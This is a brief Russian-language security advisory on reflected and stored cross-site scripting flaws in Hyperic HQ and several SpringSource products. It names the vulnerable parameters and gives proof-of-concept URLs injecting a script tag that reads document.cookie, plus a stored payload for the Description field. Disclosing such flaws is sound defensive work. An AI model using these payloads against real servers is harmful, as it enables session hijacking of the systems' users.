Программа:
Hyperic HQ Open Source 3.x
Hyperic HQ Open Source 4.x
SpringSource AMS 2.x
SpringSource tc Server 6.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "typeId" сценарием mastheadAttach.do, в параметре "eid" сценарием
Resource.do, и в параметре "u" сценарием admin/user/UserAdmin.do. Атакующий
может выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "Description". Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://<hyperic-server>:7080/mastheadAttach.do?typeId=<script>alert(document.cookie)</script>
http://<hyperic-server>:7080/Resource.do?eid=<script>alert(document.cookie)</script>
http://<hyperic-server>:7080/admin/user/UserAdmin.do?mode=view&u=<script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

http://<hyperic-server>:7080/alerts/Config.do?mode=list&rid=10001&type=3

Оставить мнение